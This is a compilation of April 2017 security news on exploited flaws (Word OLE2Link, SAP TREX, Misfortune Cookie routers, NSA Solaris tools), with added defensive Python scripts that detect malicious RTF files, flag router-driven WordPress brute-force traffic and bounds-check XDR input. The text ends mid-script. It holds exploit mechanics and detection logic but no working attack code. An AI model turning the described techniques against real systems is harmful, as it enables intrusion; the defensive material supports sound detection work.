“Originally, the vulnerability was discovered in SAP HANA in 2015 and the corresponding SAP Security Note (2234226) was released in December 2015. The issue was dubbed a potential technical information disclosure and fixed by removing some critical functions.” continues the post. “Later on, Mathieu Geli from ERPScan conducted a further research and revealed that the vulnerability was still exploitable. He found out that TREXNet, an internal communication protocol used by TREX, did not provide an authentication procedure.”

The expert reverse engineered the protocol for HANA and then for the SAP TREX search engine. Because both share a common protocol, the exploit could be easily adapted. He highlighted that SAP had fixed only some features of the core protocol.

“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX.” explained the expert.

The vulnerability, tracked as CVE-2017-7691, could be exploited by an attacker to read or create operating system files by sending a crafted request to TREXNet ports.

The flaw was fixed along with other bugs in SAP’s April security release.


Not Just Criminals, But Governments Were Also Using MS Word 0-Day Exploit
13.4.2017 thehackernews Vulnerebility
Recently we reported about a critical code execution vulnerability in Microsoft Word that was being exploited in the wild by cyber criminal groups to distribute malware like Dridex banking trojans and Latentbot.
Now, it turns out that the same previously undisclosed vulnerability in Word (CVE-2017-0199) was also being actively exploited by government-sponsored hackers to spy on Russian targets since at least January of this year.
The news comes after security firm FireEye, which independently discovered this flaw last month, published a blog post revealing that FinSpy spyware was installed as early as January using the same vulnerability in Word that was patched on Tuesday by Microsoft.
For those unaware, the vulnerability (CVE-2017-0199) is a code execution flaw in Word that could allow an attacker to take over a fully patched and up-to-date computer when the victim opens a Word document containing a booby-trapped OLE2link object, which downloads a malicious HTML application from a server, disguised as a document created in Microsoft's RTF (Rich Text Format).
FinSpy or FinFisher is associated with the controversial UK-based firm Gamma Group, which sells so-called "lawful intercept" spyware to governments around the world.
"Though only one Finspy user has been observed leveraging this zero-day exploit, the historical scope of Finspy, a capability used by several nation-states, suggests other customers had access to it," FireEye researchers said.
"Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective—a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere."
Months later in March, the same then-zero-day vulnerability was used to install Latentbot, a bot-like, information-stealing and remote-access malware package used by financially motivated criminals.
Latentbot has several malicious capabilities including credential theft, remote desktop functions, hard drive and data wiping, and the ability to disable antivirus software.
FireEye said criminals used social engineering to trick victims into opening the attachments with generic subject lines like "hire_form.doc", "!!!!URGENT!!!!READ!!!.doc", "PDP.doc", and "document.doc".
However, on Monday, the criminals behind the attack modified their campaign to deliver a different malware package called Terdot, which then installed software that uses the Tor anonymity service to hide the identity of the servers it contacted.
According to FireEye researchers, the MS Word exploit used to install FinSpy on Russian computers by government spies and the one used in March to install Latentbot by criminal hackers were obtained from the same source.
This finding suggests that whoever initially discovered this zero-day vulnerability sold it to many actors, including commercial companies that deal in buying and selling zero-day exploits as well as financially motivated online criminals.
Also, on Monday evening, Proofpoint researchers discovered a massive spam email campaign targeting millions of users across financial institutions in Australia with the Dridex banking malware, again by exploiting the same vulnerability in Word.
FireEye researchers are still not sure of the source for the exploit that delivered the Dridex banking trojan, but it is possible that the vulnerability disclosure by McAfee last week provided insight that helped Dridex operators use the flaw, or that someone with access to the Word exploit gave it to them.
Microsoft patched the MS Word vulnerability on Tuesday, after hackers, as well as government spies, had been exploiting it for months. Users are strongly advised to install the updates as soon as possible to protect themselves against the ongoing attacks.
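As an added example, not code from the article or from FireEye's or Microsoft's analysis, the following Python triage script scans an RTF document for the combination the article describes: an embedded object whose data names the OLE2Link class and which is marked to update as soon as the document opens. The sample documents are constructed inline; the OLE 1.0 header layout used in them is an assumption, and a hit is a signal for sandboxing or analyst review rather than a verdict, because linked objects also occur in legitimate files.

```python
"""Triage heuristic for RTF documents carrying an auto-updating OLE2Link object.

Added example; not code from the article or from FireEye/Microsoft. It flags
the combination the text describes: an RTF \\object group whose \\objdata hex
decodes to an object stream naming the "OLE2Link" class, together with the
\\objupdate control word that makes Word refresh the link when the file opens.
A hit is a triage signal, not a verdict: linked objects also occur in
legitimate documents, so matches go to a sandbox or an analyst.
"""
import re
from dataclasses import dataclass

OBJECT_RE = re.compile(rb"\\object\b")        # start of an embedded/linked object group
OBJUPDATE_RE = re.compile(rb"\\objupdate\b")  # forces the object to update on open
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]*)")  # hex payload of the object


@dataclass
class RtfFindings:
    is_rtf: bool        # content starts with the RTF magic, whatever the extension says
    object_groups: int  # number of \object groups seen
    ole2link: bool      # some object payload names the OLE2Link class
    objupdate: bool     # \objupdate control word present

    @property
    def suspicious(self) -> bool:
        # A linked OLE2 object forced to refresh on open is the pattern worth escalating.
        return self.is_rtf and self.ole2link and self.objupdate


def looks_like_rtf(data: bytes) -> bool:
    """RTF starts with '{\\rtf'; a .doc that is really RTF is itself a triage hint."""
    return data.lstrip().startswith(b"{\\rtf")


def decode_objdata(hex_blob: bytes) -> bytes:
    """Remove RTF line breaks and spaces from an \\objdata payload and decode the hex."""
    compact = re.sub(rb"\s+", b"", hex_blob)
    try:
        return bytes.fromhex(compact.decode("ascii"))
    except ValueError:
        return b""  # odd length or non-hex junk: nothing inspectable


def scan_rtf(data: bytes) -> RtfFindings:
    """Scan raw document bytes and report the indicators described above."""
    ole2link = False
    for m in OBJDATA_RE.finditer(data):
        # The OLE 1.0 object header carries the class name as a length-prefixed
        # string; the exploit documents named the "OLE2Link" class there.
        if b"OLE2Link" in decode_objdata(m.group(1)):
            ole2link = True
            break
    return RtfFindings(
        is_rtf=looks_like_rtf(data),
        object_groups=len(OBJECT_RE.findall(data)),
        ole2link=ole2link,
        objupdate=OBJUPDATE_RE.search(data) is not None,
    )


# Constructed samples (not real documents). The hex is an OLE 1.0 header:
# version 0x00000501, a format id, then the length-prefixed class name.
SUSPECT_RTF = (
    b"{\\rtf1\\ansi\n"
    b"{\\object\\objautlink\\objupdate\\rsltpict\\objw1\\objh1\n"
    b"{\\*\\objdata 01050000 02000000 08000000 4f4c45324c696e6b\n"
    b"00000000 00000000 00000000}}\n"
    b"\\par Quarterly report attached.}\n"
)
BENIGN_RTF = (
    b"{\\rtf1\\ansi\n"
    b"{\\object\\objemb{\\*\\objclass Package}\n"
    b"{\\*\\objdata 01050000 02000000 08000000 5061636b61676500 00000000}}\n"
    b"\\par Quarterly report attached.}\n"
)

if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT_RTF), ("benign", BENIGN_RTF)):
        findings = scan_rtf(blob)
        print(f"{name}: {findings} -> {'ESCALATE' if findings.suspicious else 'ok'}")
```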


BIND Updates Patch Three Vulnerabilities

13.4.2017 securityweek Vulnerebility

The Internet Systems Consortium (ISC) announced this week that updates released for the DNS software BIND patch several denial-of-service (DoS) vulnerabilities that can be exploited remotely.

BIND versions 9.9.9-P8, 9.10.4-P8 and 9.11.0-P5 address three new security holes that could lead to an assertion failure.

The most serious of the flaws, with a “high” severity rating and a CVSS score of 7.5, is CVE-2017-3137. The vulnerability allows an attacker to cause a DoS condition, and it mainly affects recursive resolvers, but authoritative servers could also be vulnerable if they perform recursion.

“A server which is performing recursion can be forced to exit with an assertion failure if it can be caused to receive a response containing CNAME or DNAME resource records with certain ordering,” ISC said in its advisory.

Another vulnerability patched with the latest BIND updates is CVE-2017-3136, a medium severity issue that affects servers configured to use DNS64 with the "break-dnssec yes;" option.

The third flaw, CVE-2017-3138, can be exploited to cause the BIND name server (named) process to exit by sending it a null command string on its control channel. However, the flaw can only be exploited remotely from hosts that are allowed access to the control channel.

ISC said there was no evidence that any of these vulnerabilities had been exploited in the wild.

BIND vulnerable to new reflection attacks

Earlier this month, Ixia security software engineer Oana Murarasu reported finding a new DDoS attack amplification method. The expert discovered that BIND’s recursive DNS resolver allows reflection attacks through root DNAME query responses.

“This amplification attack generates responses 10 or more times larger than the query sent,” Murarasu explained. “For every 1 megabit of traffic sent, 10 megabits is sent to the victim.”

The issue has been reported to ISC, but the organization determined that these attacks are possible due to a protocol design flaw and not a vulnerability in BIND itself. Ixia said Microsoft’s DNS server is not susceptible to such attacks.


Tens of thousands of compromised routers abused in WordPress attacks
13.4.2017 securityaffairs Attack

Hackers exploited the CVE-2014-9222 flaw, also known as ‘Misfortune Cookie’, to hack thousands of home routers and abuse them for WordPress attacks.
According to the experts at the security firm Wordfence, tens of thousands of home routers have been hacked and used to power cyber attacks on WordPress websites.
The security firm observed a spike in the number of attacks originating from Algeria that targeted customer websites. Further investigation revealed that the attacks were launched from more than 10,000 IP addresses, most of which were associated with the state-owned telecoms company Telecom Algeria.

“Last week, while creating the Wordfence monthly attack report, we noticed that Algeria had moved from position 60 in our “Top Attacking Countries” list to position 24. That was a big jump and we were curious why Algeria had climbed the attack rankings so rapidly.” reads the analysis published by Wordfence.

“What we discovered on closer examination is that over 10,000 IP addresses in Algeria were attacking WordPress websites in March. Most IPs were only launching between 50 and 1000 attacks during the entire month.”

The hackers exploited vulnerabilities in the routers provided by Telecom Algeria to its customers, then compromised the devices to launch brute-force and other WordPress attacks.

Wordfence identified compromised routers from 27 ISPs worldwide involved in the WordPress attacks. The routers of more than a dozen of these ISPs are listening on port 7547, which ISPs use for remote management, and the experts noticed that all of these devices are running a vulnerable version of the AllegroSoft RomPager web server.

All RomPager versions prior to 4.34 are affected by a critical vulnerability tracked as CVE-2014-9222, also known as ‘Misfortune Cookie’.


The flaw was reported in December 2014 by researchers at Check Point Software Technologies, who discovered that more than 12 million home routers were affected by the issue.

The vulnerability could be exploited by an attacker to run a man-in-the-middle attack on traffic going to and from home routers from every manufacturer.

Once an attacker compromises a router, they could target any other device on the local network, such as a smart TV or a printer.

The flaw can be exploited to hijack a large number of devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors.

The routers provided by 14 of the 28 ISPs are vulnerable to Misfortune Cookie attacks.
According to Wordfence, in just three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.

Last month, Wordfence observed more than 90,000 unique IP addresses from the 28 ISPs associated with compromised routers; most of them generate fewer than 1,000 attacks over the course of up to 48 hours, after which they stop.

“In just the past month we have seen over 90,000 unique IP addresses at 28 ISPs that fit our compromised-router attack pattern. We monitor these attacks across our customer websites which is an attack surface of over 2 million websites.” states Wordfence. “We only see a sample of the attacks that all websites globally experience. If you extrapolate the numbers, it indicates that there is a very large number of compromised ISP routers out there performing attacks and acting in concert.”

Wordfence has published a free online tool that can be used to check whether a router has port 7547 open.


Prison Inmates Built PCs from e-Waste and Connected Online Using Prison Network

13.4.2017 thehackernews Hacking

Can you imagine your world without the Internet?
I know it's hard to imagine your life without the Internet, and the same was the case of two Ohio prisoners who built personal computers from parts from e-waste, hid them in the ceiling, and connected those PCs to the Internet via the prison's network.
The incident occurred in 2015 but has now been made public by the State of Ohio's Office of the Inspector General, which published a 50-page report [PDF] on Tuesday, following almost a year-long investigation.
According to the report, a prison work program backfired when two inmates of Marion Correctional Institution in Ohio, Florida, smuggled computer parts from an e-waste recycling workshop and built two clandestine computers out of them.
The unsupervised inmates later hid the computers behind a plywood board in the ceiling of a training room, and then connected those working PCs to the Ohio Department of Rehabilitation and Correction (ODRC) network to access the Internet.
But once the inmates got online, unsurprisingly, they used their skills to break the law.
The prisoners accessed the internal records of other inmates, created inmate passes for restricted areas, accessed websites with information about manufacturing drugs, weapons, and explosives, and applied for credit cards under another prisoner's name for a planned tax fraud scheme, Ohio's government watchdog said.
Besides this, the forensics team also found "self-signed certificates, Pidgin chat accounts, Tor sites, Tor geo exit nodes, ether soft, pornography, videos, VideoLan, virtual phone, and other various software."
The scheme was discovered after prison technology employee Gene Brady raised the alarm about unusual levels of internet activity on a contractor's account on days when that employee was not scheduled to work.
Ultimately, a total of five inmates were identified as being involved with the hidden computers during the investigation:
Stanislov Transkiy – Executive committee chairman of Recycling.
Leeshan McCullough – Chairman of aquaculture.
Robert Cooper – Chairman of horticulture.
Matthew Brown – Chairman of environmental education.
Adam Johnston – Executive committee treasurer.
All five inmates have now been separated and moved to other correctional facilities.
"We will thoroughly review the reports and take any additional steps necessary to prevent these types of things from happening again," the ODRC said in a statement.
"It's of critical importance that we provide necessary safeguards in regards to the use of technology while still providing opportunities for offenders to participate in meaningful and rehabilitative programming."
The Marion Correctional Institution (MCI), which houses nearly 2,500 inmates, operates many programs to educate or provide services to the community, including the MCI Green Initiative to revamp the institution's trash and recycling processes.


Psycho-Analytics Could Aid Insider Threat Detection

12.4.2017 securityweek Safety
Psycho-Analytics Could Help Detect Future Malicious Behavior

The insider threat is perhaps the most difficult security risk to detect and contain -- and concern is escalating to such an extent that a new bill, H.R.666 - Department of Homeland Security Insider Threat and Mitigation Act of 2017, passed through Congress unamended in January 2017.

The bill text requires the Department of Homeland Security (DHS) to establish an Insider Threat Program, including training and education, and to "conduct risk mitigation activities for insider threats." What it does not do, however, is explain what those 'mitigation activities' should comprise.

One difficulty is that the insider is not a uniform threat. It includes the remote attacker who becomes an insider through using legitimate but stolen credentials, the naive employee, the opportunistic employee, and the malicious insider. Of these, the malicious insider is the most intransigent concern.

Psycho-analytics Used for Insider Threat Detection

Traditional security controls, such as access control and DLP, have some, but limited, effect. In recent years, these have been supplemented by user behavior analytics (UBA), which uses machine learning to detect anomalous user behavior within the network.

"Behavioral analytics is the only way to... get real insight into insider threat," explains Nir Polak, CEO of Exabeam. "UBA tells you when someone is doing something that is unusual and risky, on an individual basis and compared to peers. UBA cuts through the noise to give real insight – any agencies looking to get a handle on insider threat should be looking closely at UBA."

Humphrey Christian, VP of Product Management, at Bay Dynamics, advocates a combination of UBA and risk management. "A threat is not a threat if it's targeting an asset that carries minimal value to the organization. An unusual behavior is also not a threat if it was business justified, such as it was approved by the employee's manager," he told SecurityWeek. "Once an unusual behavior is identified, the application owner who governs the application at risk, must qualify if he indeed gave the employee access to the asset. If the answer is 'no', then that alert should be sent to the top of the investigation pile."

This week a new paper published by the Intelligence and National Security Alliance (INSA) proposes that physical user behavioral analytics should go a step further and incorporate psycho-analytics set against accepted behavior models. These are not just the baseline of acceptable behavior on the network, but incorporate the psychological effect of life events both inside and outside of the workplace. The intent is not merely to respond to anomalous behavior that has already happened, but to get ahead of the curve and be able to predict malicious behavior before it happens.

The INSA paper starts from the observation that employees don't just wake up one morning and decide to be malicious. Malicious behavior is invariably the culmination of progressive dissatisfaction. That dissatisfaction can be with events both within and outside the workplace. INSA's thesis is that clues to this progressive dissatisfaction could and should be detected by technology; machine learning (ML) and artificial intelligence (AI).

This early detection would allow managers to intervene and perhaps help a struggling employee and prevent a serious security event.

Early signs of unhappiness within the workplace can be relatively easy to detect when they manifest as 'counterproductive work behaviors' (CWBs). INSA suggests that there are three key insights "that are key to detecting and mitigating employees at risk for committing damaging insider acts." CWBs do not occur in isolation; they usually escalate; and they are seldom spontaneous.

Successful insider threat mitigation can occur when early non-harmful CWBs can be detected before they escalate.

Using existing studies, such as the Diagnostic and Statistical Manual of Mental Disorders Vol. 5 (DSM-5), INSA provides a table of stressors and potentially linked CWBs. For example, emotional stress at the minor level could lead to repeated tardiness; at a more serious level it could lead to bullying co-workers and unsafe (dangerous) behavior. INSA's argument is that while individual CWBs might be missed by managers and HR, patterns -- and any escalation of stress indicators -- could be detected by ML algorithms. This type of user behavior analytics goes beyond anomalous network activity and seeks to recognize stressed user behavior that could lead to anomalous network activity before it happens.

But it still suffers from one weakness -- that is, where the stressors that affect the user's work occur entirely outside of the workplace; such as divorce, financial losses, or family illness. Here INSA proposes a more radical approach, but one that would work both inside and outside the workplace.

"In particular," it suggests, "sophisticated psycholinguistic tools and text analytics can monitor an employee's communications to identify life stressors and emotions and help detect potential issues early in the transformation process."

The idea is to monitor and analyze users' communications, which could include tweets and blogs. The analytics would look for both positive and negative words. An example is given. "I love food ... with ... together we ... in ... very ... happy." This sequence could easily appear in a single tweet; but the use of 'with', 'together', and 'in' would suggest an inclusive and agreeable temperament.

In fairness to doubters, INSA has done itself no favors with the misuse of a second example. Here Chelsea (formerly Bradley) Manning is quoted. "A second blog post," says INSA, "substantiates that Life Event and identifies an additional one, 'Relationship End/Divorce' with two mentions for each Life Event." The implication is that psycholinguistic analysis of this post would have highlighted the stressors in Manning's life and warned employers of the potential for malicious activity. The problem, however, is that the quoted section comes not from a Manning blog post before the event, but from the chat logs of his conversation with Lamo in May 2010 (see Wired) after WikiLeaks had started publishing the documents. The linguistic analysis in this case might have helped explain Manning's actions, but could do nothing to forewarn the authorities.

The point, however, is that psycholinguistic analysis has the potential to highlight emotional status, and over time, highlight individuals on an escalating likelihood of developing first minor CWBs and ultimately major CWBs. The difficulty is that it really is kind of creepy. That creepiness is acknowledged by INSA. "Use of these tools entails extreme care to assure individuals' civil or privacy rights are not violated," it says. "Only authorized information should be gathered in accordance with predefined policies and legal oversight and only used for clearly defined objectives. At no point should random queries or 'What If' scenarios be employed to examine specific individuals without predicate and then seek to identify anomalous bad behavior."

Users' decreasing expectation of privacy would suggest that sooner or later psycholinguistic analysis for the purpose of identifying potential malicious insiders before they actually become malicious insiders will become acceptable. In the meantime, however, it should be used with extreme caution and with the clear, unambiguous informed consent of users. What INSA is advocating, however, is an example of what law enforcement agencies have been seeking for many years: the ability to predict rather than just respond to bad behavior.


Thousands of Hacked Routers Used for WordPress Attacks

12.4.2017 securityweek Attack
Tens of thousands of vulnerable home routers have been hacked and abused to launch attacks on WordPress websites, security firm Wordfence reported on Tuesday.

Last month, the company noticed that the number of attacks launched against customer websites from Algeria had increased significantly compared to the previous period. A closer analysis of the more than 10,000 attacking IP addresses revealed that most were associated with state-owned telecoms company Telecom Algeria.

Wordfence has determined that hackers exploited vulnerabilities in the routers provided by Telecom Algeria to customers, and then abused the hijacked devices to launch brute-force and other types of attacks on WordPress sites.

Researchers identified compromised routers from 27 other ISPs worldwide, including ones in Pakistan, India, the Philippines, Turkey, Egypt, Morocco, Malaysia, Brazil, Indonesia, Serbia, Saudi Arabia, Russia, Romania, Sri Lanka, Croatia and Italy.

The routers of more than a dozen of these ISPs are listening on port 7547, which is used by companies to manage their customers’ devices, and are running a vulnerable version of the AllegroSoft RomPager web server.

Versions prior to 4.34 of RomPager are affected by a critical vulnerability – tracked as CVE-2014-9222 and dubbed “Misfortune Cookie” – that can be exploited to hijack devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors. When they first disclosed the flaw back in December 2014, researchers warned that there had been at least 12 million vulnerable routers across most of the world’s countries.

According to Wordfence, 14 of the 28 ISPs provide routers vulnerable to Misfortune Cookie attacks. Researchers also pointed to another vulnerability, disclosed last year, that can be exploited to hijack home routers that use port 7547.

The company reported that, over the course of three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.

In the past month, Wordfence has seen more than 90,000 unique IP addresses from the 28 ISPs that appear to be associated with compromised routers. Experts said most IP addresses generate less than 1,000 attacks over the course of up to 48 hours, after which they stop.

WordFence has made available a simple online tool that can be used to check if a router has port 7547 open.
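The compromised-router pattern that both Wordfence reports describe (bursts of 50 to 1,000 login attempts per IP, confined to at most 48 hours, from many sources at once) can be checked against a site's own access logs. The script below is an added example, not code from either article or from Wordfence; it parses Apache/nginx combined-format log lines, counts POSTs to wp-login.php and xmlrpc.php per source, and flags sources that fit the profile. The thresholds, the endpoint list and the sample log lines are constructed for this example.

```python
"""Detect the compromised-router pattern in WordPress access logs.

Added example; not code from the articles or from Wordfence. It parses web
server access logs (Apache/nginx combined format), counts POSTs to the
WordPress login endpoints per source IP, and flags sources that fit the
profile the articles describe: a modest burst of attempts (tens to a
thousand) confined to a window of up to 48 hours. Thresholds, endpoint list
and sample traffic are constructed for this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Optional, Set

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
LOGIN_ENDPOINTS = ("/wp-login.php", "/xmlrpc.php")  # brute-force targets (assumed list)


@dataclass
class SourceStats:
    attempts: int = 0
    first: Optional[datetime] = None
    last: Optional[datetime] = None

    @property
    def window(self) -> timedelta:
        """Time span between the first and last attempt from this source."""
        return self.last - self.first if self.attempts else timedelta(0)


def parse_line(line: str):
    """Return (ip, timestamp, method, path) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]


def login_attempts(lines: Iterable[str]) -> Dict[str, SourceStats]:
    """Per-source count and time span of POSTs to the login endpoints."""
    stats: Dict[str, SourceStats] = defaultdict(SourceStats)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method != "POST" or path not in LOGIN_ENDPOINTS:
            continue
        s = stats[ip]
        s.attempts += 1
        s.first = ts if s.first is None else min(s.first, ts)
        s.last = ts if s.last is None else max(s.last, ts)
    return dict(stats)


def router_pattern(stats: Dict[str, SourceStats], min_attempts: int = 50,
                   max_attempts: int = 1000,
                   max_window: timedelta = timedelta(hours=48)) -> Set[str]:
    """Sources whose burst size and duration match the hijacked-router profile."""
    return {ip for ip, s in stats.items()
            if min_attempts <= s.attempts <= max_attempts and s.window <= max_window}


def share_of_attempts(stats: Dict[str, SourceStats], sources: Set[str]) -> float:
    """Fraction of all login POSTs that came from the given sources."""
    total = sum(s.attempts for s in stats.values())
    return sum(stats[ip].attempts for ip in sources) / total if total else 0.0


# ---- constructed sample traffic (documentation address ranges, not real hosts) ----
T0 = datetime(2017, 3, 12, 3, 0, tzinfo=timezone.utc)


def make_posts(ip: str, start: datetime, count: int, spacing: timedelta) -> List[str]:
    """Constructed log lines: `count` login POSTs from `ip`, `spacing` apart."""
    return [
        f'{ip} - - [{(start + i * spacing):%d/%b/%Y:%H:%M:%S %z}] '
        f'"POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"'
        for i in range(count)
    ]


SAMPLE_LOG = (
    make_posts("203.0.113.10", T0, 60, timedelta(minutes=5))                      # router burst
    + make_posts("203.0.113.11", T0 + timedelta(hours=1), 60, timedelta(minutes=4))
    + make_posts("203.0.113.12", T0 + timedelta(hours=20), 60, timedelta(minutes=6))
    + make_posts("198.51.100.7", T0, 60, timedelta(hours=1))                      # 59 h span: not the pattern
    + [f'198.51.100.20 - - [{T0:%d/%b/%Y:%H:%M:%S %z}] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
       f'198.51.100.20 - - [{T0:%d/%b/%Y:%H:%M:%S %z}] "GET /wp-admin/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
       "garbage line that does not parse"]
)

if __name__ == "__main__":
    stats = login_attempts(SAMPLE_LOG)
    flagged = router_pattern(stats)
    print(f"{len(flagged)} sources match the router pattern; "
          f"{share_of_attempts(stats, flagged):.1%} of login attempts")
```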


Terror Exploit Kit Rising as Sundown Disappears

12.4.2017 securityweek Exploit
One year after the exploit kit (EK) landscape was shaken by the sudden disappearance of the Angler and Nuclear kits, another change is happening in the segment. While the Sundown EK has been inactive for the past month or so, the recent Terror EK is being used in new campaigns, researchers say.

While not new, Sundown has been a small player in the EK market, and showed increased presence only after Neutrino became silent last September, although it didn’t make it to the top three by the end of the year.

Its operators have been highly active with the integration of new exploits and the adoption of new technologies, including steganography, which allowed them to hide exploits in harmless-looking image files.

Just weeks ago, Cisco Talos published an analysis of Sundown, revealing the latest changes the EK’s operators had adopted, such as a switch to new vulnerabilities to exploit and modifications to the landing page’s code, which started showing similarities to the RIG EK.

Soon after, however, security researchers noticed that Sundown had been silent for over a month, and started questioning whether it still existed:


Kafeine @kafeine
Sundown (Beps) and Nebula out ? More than one month since last hits.
11:26 AM - 8 Apr 2017
Variants of Sundown also seem to have disappeared from the scene, including Bizarro and Greenflash, which could suggest a complete cessation of operations, Malwarebytes Labs researchers suggest. However, it remains to be seen whether Sundown is just taking a break or has completely vanished.

Simultaneously, another EK is picking up pace, namely Terror. Initially detailed in January and considered to be a Sundown variant due to many code similarities, Terror appears involved in several distribution campaigns, and the security researchers suggest that it could pose a real threat.

Terror EK’s author, whom Trustwave identified on various underground forums by the handle @666_KingCobra, is selling the kit under different names, researchers say. Apparently, the threat has also been known under the names Blaze, Neptune, and Eris.

The best known instance of Terror is engaged in a malvertising campaign distributing Smoke Loader, which Malwarebytes has been monitoring for a while. Leveraging various ad networks that generate low quality traffic, the campaign uses Internet Explorer, Flash, and Silverlight exploits to compromise users’ systems.

A newer campaign, however, uses a different landing page and no longer distributes Smoke Loader, but pushes the Andromeda malware as the final payload. Active only for a few days, the campaign redirects to the EK landing page either via the server 302 redirect call, or via script injection. Only Flash and Internet Explorer exploits are abused in these attacks.

“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.


DARPA Wants Hardware With Built-in Security

12.4.2017 securityweek Safety
DARPA seeking solutions for more secure hardware

The U.S. Defense Advanced Research Projects Agency (DARPA) announced this week a new program that aims to develop a framework for building hack protections directly into hardware.

The agency pointed out that the integrated circuits found in many devices often have vulnerabilities that can be exploited by software, and software patches represent only a temporary solution.

As part of a new 39-month program named System Security Integrated Through Hardware and Firmware (SSITH), DARPA hopes to receive proposals for new chip architectures which would disarm software attacks that leverage hardware flaws.

The SSITH project focuses on two main technical areas: developing a secure hardware architecture and tools to help manufacturers take advantage of security innovations, and identifying a methodology and metrics for determining the security status of new systems.

Some chip makers, such as Intel, have already been integrating various protections into their products, but DARPA wants design tools that would be widely available, leading to built-in security becoming a standard for integrated circuits used in U.S. Department of Defense and commercial systems.

DARPA said proposals should address one or more of the seven hardware vulnerability classes in the Common Weaknesses Enumeration (CWE) list. These include code injections, permissions and privileges, buffer errors, information leakage, resource management, numeric errors, and cryptographic issues.

The agency pointed out that more than 2,800 incidents have involved one of these vulnerabilities, and SSITH program manager Linton Salmon, of DARPA’s Microsystems Technology Office, believes more than 40 percent of software weaknesses can be addressed by removing these types of flaws.

“Security for electronic systems has been left up to software until now, but the overall confidence in this approach is summed up in the sardonic description of this standard practice as ‘patch and pray,’” said Salmon. “This race against ever more clever cyberintruders is never going to end if we keep designing our systems around gullible hardware that can be fooled in countless ways by software.”

Experts interested in submitting a proposal can learn more about the project and have the opportunity to team up with others on Friday, April 21, 2017, at the Booz Allen Hamilton Conference Center.


Watch out! Shadow Brokers dump includes remote root exploits for Solaris boxes
12.4.2017 securityaffairs BigBrothers

The security expert Matthew Hickey has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.
After the mysterious Shadow Brokers group has leaked the archive containing the stolen NSA hacking tools and exploits, security experts started analyzing the huge trove of data. Experts discovered that NSA operators developed an attack code to compromise Oracle’s Solaris.

The cyber security expert Matthew Hickey, co-founder of the British security shop Hacker House, discovered while digging through the archive two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.


Hacker Fantastic @hackerfantastic
EXTREMEPARR - 0day local privilege escalation attack working on Solaris 7,8,9,10 x86 & SPARC (confirmed & tested, platforms & versions.)
9:31 PM - 10 Apr 2017

Hacker Fantastic @hackerfantastic
CONFIRMED #0day EBBISLAND (EBBSHAVE) is a root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86. pwn
12:00 AM - 11 Apr 2017
Both tools could be used by a logged-in user to escalate privileges to root, and obtain root access remotely over the network. The tools work on Solaris systems running versions 6 to 10 on x86 and Sparc, and experts believe it could work also on the latest build, version 11.

The EXTREMEPARR tool elevates the logged-in entity (i.g. a user, a script) to root by abusing dtappgather, file permissions, and the setuid binary at.

The EBBISLAND tool can be pointed at any open RPC service to spawn a remote root shell on a vulnerable Solaris box. EBBISLAND triggers a buffer overflow vulnerability in Solaris’s XDR code, the layer that decodes the length-prefixed fields of incoming RPC messages.
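To make the vulnerability class concrete, here is an added example (not code from the leaked tools, from Hacker House or from Solaris) of the checks an XDR decoder must perform on the length prefix of a variable-length field. The length is attacker-controlled; copying that many bytes into a fixed-size destination without comparing it to the declared maximum and to the bytes actually remaining in the message is exactly the overflow pattern described above. The decoder is a minimal hand-written one, the two-field request layout is hypothetical, and the messages are constructed for the example.

```python
import struct


class XdrError(ValueError):
    """Raised when an XDR message is malformed or violates a declared bound."""


def decode_opaque(buf: bytes, offset: int, max_len: int):
    """Decode an XDR variable-length opaque<max_len> at buf[offset:].

    Returns (data, next_offset). Every bound is checked before any copy:
    the 4-byte length prefix must be present, the declared length must not
    exceed the type's maximum, and the padded payload must fit in what is
    left of the message. Omitting the last two checks is the classic
    overflow: a length of 0xFFFFFFFF becomes a copy far past the buffer.
    """
    if offset + 4 > len(buf):
        raise XdrError("truncated length prefix")
    (n,) = struct.unpack_from(">I", buf, offset)      # XDR integers are big-endian
    if n > max_len:
        raise XdrError(f"declared length {n} exceeds maximum {max_len}")
    padded = (n + 3) & ~3                              # XDR pads opaque data to 4 bytes
    if offset + 4 + padded > len(buf):
        raise XdrError(f"declared length {n} exceeds remaining {len(buf) - offset - 4} bytes")
    start = offset + 4
    return bytes(buf[start:start + n]), start + padded


def decode_string(buf: bytes, offset: int, max_len: int):
    """XDR string<max_len>: same wire format as opaque, decoded as ASCII."""
    data, nxt = decode_opaque(buf, offset, max_len)
    try:
        return data.decode("ascii"), nxt
    except UnicodeDecodeError as exc:
        raise XdrError("string is not ASCII") from exc


def encode_opaque(data: bytes) -> bytes:
    """Length-prefixed, 4-byte padded encoding, used here to build test messages."""
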